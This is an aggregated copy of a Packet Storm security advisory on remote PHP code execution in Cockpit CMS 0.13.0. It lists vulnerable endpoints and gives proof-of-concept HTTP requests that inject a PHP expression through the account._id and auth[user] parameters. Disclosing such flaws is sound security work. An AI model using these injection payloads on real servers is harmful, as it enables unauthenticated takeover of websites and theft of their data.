📄 Cockpit CMS 0.13.0 Remote Code Execution_PACKETSTORM:214773

Description

Multiple remote code execution vulnerabilities exist in Cockpit CMS version 0.13.0. The vulnerabilities allow remote attackers to execute arbitrary PHP code on the server. This issue is older research added to the archive...

Visit Original Source

Basic Information

ID PACKETSTORM:214773

Published Feb 2, 2026 at 00:00

Affected Product

Affected Versions Cockpit CMS 0.13.0 - Remote Code Execution
Advisory ID: RO-16-004
Severity: Critical
Vendor: Cockpit
Product: Cockpit CMS
Version: 0.13.0

Overview #

Multiple Remote Code Execution (RCE) vulnerabilities exist in Cockpit CMS version 0.13.0. The vulnerabilities allow remote attackers to execute arbitrary PHP code on the server.

Vulnerability Details #

Affected Versions: 0.13.0 and earlier

Location: Multiple endpoints including /accounts/save, /auth/check, /api/galleries/findOne, /api/collections/findOne

Affected Parameters: account._id, auth[user], filter._id

Root Cause: The vulnerability exists due to improper handling of user input in JSON parameters, allowing PHP code evaluation.

Exploitation Requirements #

No authentication required for some vectors
Direct access to vulnerable endpoints

Impact #

Remote attackers can exploit these vulnerabilities to:

Execute arbitrary PHP code on the server
Gain complete control of the CMS
Access sensitive files and databases
Pivot to internal network resources

Proof of Concept #

POST /cockpit-0.13.0/accounts/save HTTP/1.1
Host: target.com
Content-Type: application/json

{"account":{"_id":"'+print(int)0xFFF9999-22+'"}}

POST /cockpit-0.13.0/auth/check HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

auth[user]='+print(int)0xFFF9999-22+'

Solution #

Upgrade to a patched version of Cockpit CMS that includes proper input sanitization.

References #

Invicti Advisory NS-16-016

Timeline:

[2016-06-30] - Reported
[2016-09-19] - Advisory released

Credits: Omar Kurt

{
    "lastseen": "2026-02-02T18:37:43",
    "description": "Multiple remote code execution vulnerabilities exist in Cockpit CMS version 0.13.0. The vulnerabilities allow remote attackers to execute arbitrary PHP code on the server. This issue is older research added to the archive...",
    "published": "2026-02-02T00:00:00",
    "modified": "2026-02-02T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Cockpit CMS 0.13.0 Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:214773",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "Cockpit CMS 0.13.0 - Remote Code Execution\n    Advisory ID: RO-16-004\n    Severity: Critical\n    Vendor: Cockpit\n    Product: Cockpit CMS\n    Version: 0.13.0\n    \n    \n    Overview #\n    \n    Multiple Remote Code Execution (RCE) vulnerabilities exist in Cockpit CMS version 0.13.0. The vulnerabilities allow remote attackers to execute arbitrary PHP code on the server.\n    \n    \n    Vulnerability Details #\n    \n    Affected Versions: 0.13.0 and earlier\n    \n    Location: Multiple endpoints including /accounts/save, /auth/check, /api/galleries/findOne, /api/collections/findOne\n    \n    Affected Parameters: account._id, auth[user], filter._id\n    \n    Root Cause: The vulnerability exists due to improper handling of user input in JSON parameters, allowing PHP code evaluation.\n    \n    \n    Exploitation Requirements #\n    \n        No authentication required for some vectors\n        Direct access to vulnerable endpoints\n    \n    Impact #\n    \n    Remote attackers can exploit these vulnerabilities to:\n    \n        Execute arbitrary PHP code on the server\n        Gain complete control of the CMS\n        Access sensitive files and databases\n        Pivot to internal network resources\n    \n    Proof of Concept #\n    \n    POST /cockpit-0.13.0/accounts/save HTTP/1.1\n    Host: target.com\n    Content-Type: application/json\n    \n    {\"account\":{\"_id\":\"'+print(int)0xFFF9999-22+'\"}}\n    \n    POST /cockpit-0.13.0/auth/check HTTP/1.1\n    Host: target.com\n    Content-Type: application/x-www-form-urlencoded\n    \n    auth[user]='+print(int)0xFFF9999-22+'\n    \n    \n    \n    Solution #\n    \n    Upgrade to a patched version of Cockpit CMS that includes proper input sanitization.\n    \n    \n    References #\n    \n        Invicti Advisory NS-16-016\n    \n    Timeline:\n    \n        [2016-06-30] - Reported\n        [2016-09-19] - Advisory released\n    \n    Credits: Omar Kurt",
    "sourceHref": "https://packetstorm.news/download/214773",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/214773/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply